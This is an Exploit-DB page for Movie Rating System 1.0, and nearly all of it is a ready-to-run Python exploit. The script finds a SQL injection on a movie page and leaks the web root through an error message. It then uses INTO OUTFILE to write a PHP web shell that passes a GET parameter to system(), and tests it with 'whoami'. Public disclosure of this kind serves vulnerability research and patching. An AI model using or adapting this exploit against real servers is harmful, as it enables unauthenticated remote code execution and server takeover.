Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)

EDB-ID:

50622

CVE:

N/A

EDB Verified:

Author:

Tagoletta

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2022-01-05

Vulnerable App: 
# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Ubuntu
# This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads.

import requests
import random
import string
from bs4 import BeautifulSoup

url = input("TARGET = ")

if not url.startswith('http://') and not url.startswith('https://'):
    url = "http://" + url
if not url.endswith('/'):
    url = url + "/"

payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"

let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))

resp = requests.get(url)
htmlParser = BeautifulSoup(resp.text, 'html.parser')

getMenu = htmlParser.findAll("a", {"class": "nav-link"})
selectPage = ""
for i in getMenu:
    if "movie" in i.text.lower():
        selectPage = i["href"]
        break

selectPage = selectPage.replace("./","")
findSql = url + selectPage
resp = requests.get(findSql)
htmlParser = BeautifulSoup(resp.text, 'html.parser')
movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"})

sqlPage = movieList[0]["href"]
sqlPage = sqlPage.replace("./","")

sqlPage = url + sqlPage

print("\nFinding path")

findPath = requests.get(sqlPage + '\'')
findPath = findPath.text[findPath.text.index("<b>Warning</b>:  ")+17:findPath.text.index("</b> on line ")]
findPath = findPath[findPath.index("<b>")+3:len(findPath)]
print("injection page: "+sqlPage)

parser = findPath.split('\\')
parser.pop()
findPath = ""
for find in parser:
    findPath += find + "/"

print("\nFound Path : " + findPath)

SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())

print("\n\nShell Uploading...")
status = requests.get(sqlPage+SQLtoRCE)

shellOutput = requests.get(url+shellname+".php?tago=whoami")
print("\n\nShell Output : "+shellOutput.text)
print("\nShell Path : " + url+shellname+".php")
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services